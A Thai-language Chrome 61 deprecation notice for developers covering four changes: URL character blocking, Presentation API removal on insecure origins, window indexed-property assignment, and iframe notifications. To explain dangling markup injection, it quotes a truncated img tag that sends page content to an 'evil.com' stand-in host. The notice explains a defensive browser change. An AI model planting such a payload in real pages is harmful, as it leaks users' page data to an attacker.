เราเห็นการอัปเดตและการปรับปรุงผลิตภัณฑ์ ประสิทธิภาพ และความสามารถของแพลตฟอร์มเว็บใน Chrome เกือบทุกเวอร์ชัน บทความนี้อธิบายการเลิกใช้งานและการนำออกใน Chrome 61 ซึ่งเป็นเวอร์ชันเบต้าตั้งแต่วันที่ 3 สิงหาคม รายการนี้อาจเปลี่ยนแปลงได้ตลอดเวลา
ความปลอดภัยและความเป็นส่วนตัว
บล็อกทรัพยากรที่ URL มีอักขระ "\n" และ "<"
มีการแฮ็กประเภทหนึ่งที่เรียกว่าการแทรกมาร์กอัปแบบห้อยโหน ซึ่งจะใช้ URL ที่ถูกตัดเพื่อส่งข้อมูลไปยังปลายทางภายนอก เช่น ลองพิจารณาหน้าที่มี <img src='https://evil.com/?
เนื่องจาก URL ไม่มีเครื่องหมายคำพูดปิด เบราว์เซอร์จะอ่านต่อกับเครื่องหมายคำพูดถัดไปที่เกิดขึ้น และจัดการอักขระที่ปิดล้อมเหมือนเป็น URL เดียว
Chrome 61 ช่วยลดช่องโหว่นี้โดยการจำกัดชุดอักขระที่อนุญาตในแอตทริบิวต์ href
และ src
กล่าวอย่างเจาะจงคือ Chrome จะหยุดประมวลผล URL เมื่อพบอักขระที่ขึ้นบรรทัดใหม่ (\n
) แต่มีอักขระน้อยกว่า (<
ตัว)
นักพัฒนาซอฟต์แวร์ที่มี Use Case ที่ถูกต้องสำหรับบรรทัดใหม่ และ URL ควรมีอักขระน้อยกว่า 1 ตัว ควรใช้ Escape กับอักขระเหล่านี้
เจตนาเพื่อนำออก | ตัวติดตาม Chromestatus | ข้อบกพร่อง Chromium
เลิกใช้งานและนำ Presentation API ออกในบริบทที่ไม่ปลอดภัย
พบว่าในต้นทางที่ไม่ปลอดภัย คุณสามารถใช้ Presentation API เป็นเวกเตอร์การแฮ็กในต้นทางที่ไม่ปลอดภัยได้ เนื่องจากจอแสดงผลไม่มีแถบที่อยู่ จึงใช้ API เพื่อปลอมแปลงเนื้อหาได้ อาจเป็นไปได้ที่จะขโมยข้อมูลจาก การเรียกใช้การนำเสนอ
เราวางแผนที่จะเลิกใช้งานและเลิกรองรับ Presentation API ในบริบทที่ไม่ปลอดภัย เพื่อให้สอดคล้องกับความตั้งใจของ Blink ในการนำฟีเจอร์ที่มีประสิทธิภาพในต้นทางที่ไม่ปลอดภัยออก ตั้งแต่ Chrome 61 เป็นต้นไป PresentationRequest.start()
จะไม่ทำงานในต้นทางที่ไม่ปลอดภัยอีกต่อไป
เจตนาเพื่อนำออก | ตัวติดตาม Chromestatus | ข้อบกพร่อง Chromium
JavaScript
ไม่อนุญาตให้กำหนดพร็อพเพอร์ตี้ที่จัดทำดัชนีในหน้าต่าง
ก่อนหน้านี้บางเบราว์เซอร์อนุญาตให้มีการกำหนด JavaScript ดังตัวอย่างต่อไปนี้
window[0] = 1;
หมายเหตุเกี่ยวกับข้อกำหนดของ HTML ปัจจุบัน ว่านี่เป็นการละเมิดข้อกำหนดของ JavaScript อย่างชัดแจ้ง ด้วยเหตุนี้ เราจึงนำความสามารถนี้ออกใน Chrome 61 นับตั้งแต่กุมภาพันธ์ 2016 Firefox เริ่มปฏิบัติตามข้อกำหนดแล้ว
นำการใช้การแจ้งเตือนออกจาก iframe ที่ไม่ปลอดภัย
คำขอสิทธิ์จาก iframe อาจทำให้ผู้ใช้สับสนได้ เนื่องจากความแตกต่างระหว่างต้นทางของหน้าที่มีและต้นทางของ iframe ที่ส่งคำขอนั้นเป็นเรื่องยาก เมื่อขอบเขตของคำขอไม่ชัดเจน ผู้ใช้ก็ตัดสินได้ยากว่าจะอนุญาตหรือปฏิเสธสิทธิ์
นอกจากนี้ การไม่อนุญาตการแจ้งเตือนใน iframe ยังจะช่วยให้ข้อกำหนดสิทธิ์การแจ้งเตือนสอดคล้องกับข้อความ Push อีกด้วย ซึ่งจะช่วยให้นักพัฒนาแอปง่ายขึ้น
นักพัฒนาซอฟต์แวร์ที่ต้องการฟังก์ชันนี้สามารถเปิดหน้าต่างใหม่เพื่อขอสิทธิ์การแจ้งเตือน
เจตนาเพื่อนำออก | ตัวติดตาม Chromestatus | ข้อบกพร่อง Chromium